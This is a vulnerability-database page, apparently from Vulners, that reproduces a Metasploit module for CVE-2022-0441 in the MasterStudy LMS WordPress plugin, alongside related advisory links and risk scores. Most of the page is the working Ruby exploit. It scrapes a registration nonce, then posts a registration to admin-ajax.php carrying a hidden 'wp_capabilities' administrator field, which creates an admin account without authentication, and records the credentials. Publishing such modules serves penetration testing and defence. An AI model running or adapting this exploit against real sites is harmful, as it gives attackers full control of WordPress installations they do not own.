Vulners
Lucene search
Wordpress MasterStudy Admin Account Creation
🗓️ 31 Aug 2024 00:00:00Reported by h00die, numan turle, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 181 Views
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | WordPress MasterStudy LMS 2.7.5 Plugin - Unauthenticated Admin Account Creation Vulnerability | 18 Feb 202200:00 | – | zdt |
 | Exploit for Improper Privilege Management in Stylemixthemes Masterstudy_Lms | 2 Jun 202301:53 | – | githubexploit |
 | CVE-2022-0441 | 7 Mar 202217:19 | – | circl |
 | WordPress plugin MasterStudy LMS 安全漏洞 | 18 Feb 202200:00 | – | cnnvd |
 | WordPress MasterStudy LMS Plugin Privilege Escalation (CVE-2022-0441) | 23 May 202200:00 | – | checkpoint_advisories |
 | CVE-2022-0441 | 7 Mar 202208:16 | – | cve |
 | CVE-2022-0441 MasterStudy LMS < 2.7.6 - Unauthenticated Admin Account Creation | 7 Mar 202208:16 | – | cvelist |
 | WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation | 18 Feb 202200:00 | – | exploitdb |
 | Wordpress MasterStudy Admin Account Creation | 7 Mar 202217:42 | – | metasploit |
 | MasterStudy LMS <2.7.6 - Improper Access Control | 1 Jun 202605:38 | – | nuclei |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HTTP::Wordpress
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Wordpress MasterStudy Admin Account Creation',
'Description' => %q{
MasterStudy LMS, a WordPress plugin,
prior to 2.7.6 is affected by a privilege escalation where an unauthenticated
user is able to create an administrator account for wordpress itself.
},
'Author' => [
'h00die', # msf module
'Numan Türle', # edb
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2022-0441'],
['URL', 'https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6'],
['EDB', '50752'],
['WPVDB', '173c2efe-ee9c-4539-852f-c242b4f728ed']
],
'DisclosureDate' => '2022-02-18',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)
register_options(
[
OptString.new('USERNAME', [false, 'Username to register (blank will auto generate)', '']),
OptString.new('PASSWORD', [false, 'Password (blank will auto generate)', '']),
OptString.new('EMAIL', [false, 'Email to register (blank will auto generate)', ''])
]
)
end
def check
unless wordpress_and_online?
return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
end
checkcode = check_plugin_version_from_readme('masterstudy-lms-learning-management-system', '2.7.6')
if checkcode == Msf::Exploit::CheckCode::Safe
return Msf::Exploit::CheckCode::Safe('MasterStudy LMS version not vulnerable')
end
checkcode
end
def get_username
datastore['USERNAME'].blank? ? Faker::Internet.username : datastore['USERNAME']
end
def get_password
datastore['PASSWORD'].blank? ? Rex::Text.rand_password : datastore['PASSWORD']
end
def get_email
datastore['EMAIL'].blank? ? Faker::Internet.email : datastore['EMAIL']
end
def run
username = get_username
password = get_password
email = get_email
res = send_request_cgi('uri' => normalize_uri(target_uri.path))
fail_with(Failure::Unreachable, 'Connection failed') unless res
fail_with(Failure::UnexpectedReply, 'Request failed to return a successful response') unless res.code == 200
/"stm_lms_register":"(?<nonce>\w{10})"/ =~ res.body
fail_with(Failure::UnexpectedReply, 'Unabled to retrieve MasterStudy Nonce from page') if nonce.nil?
print_status("Attempting with username: #{username} password: #{password} email: #{email}")
json_post_data = JSON.pretty_generate({
'user_login' => username,
'user_email' => email,
'user_password' => password,
'user_password_re' => password,
'become_instructor' => '',
'privacy_policy' => true,
'degree' => '',
'expertize' => '',
'auditory' => '',
'additional' => [],
'additional_instructors' => [],
'profile_default_fields_for_register' => {
'wp_capabilities' => {
'value' => { 'administrator' => 1 }
}
}
})
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
'ctype' => 'application/json',
'vars_get' => {
'action' => 'stm_lms_register',
'nonce' => nonce
},
'data' => json_post_data
)
fail_with(Failure::Unreachable, 'Connection failed') unless res
fail_with(Failure::UnexpectedReply, 'Request Failed to return a successful response') unless res.code == 200
results = res.get_json_document
if results['status'] == 'success'
print_good('Account Created Successfully')
create_credential({
workspace_id: myworkspace_id,
origin_type: :service,
module_fullname: fullname,
username: username,
private_type: :password,
private_data: password,
service_name: 'Wordpress',
address: datastore['RHOST'],
port: datastore['RPORT'],
protocol: 'tcp',
status: Metasploit::Model::Login::Status::UNTRIED
})
else
print_error("Account Creation Failed: #{results['message']}")
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.81347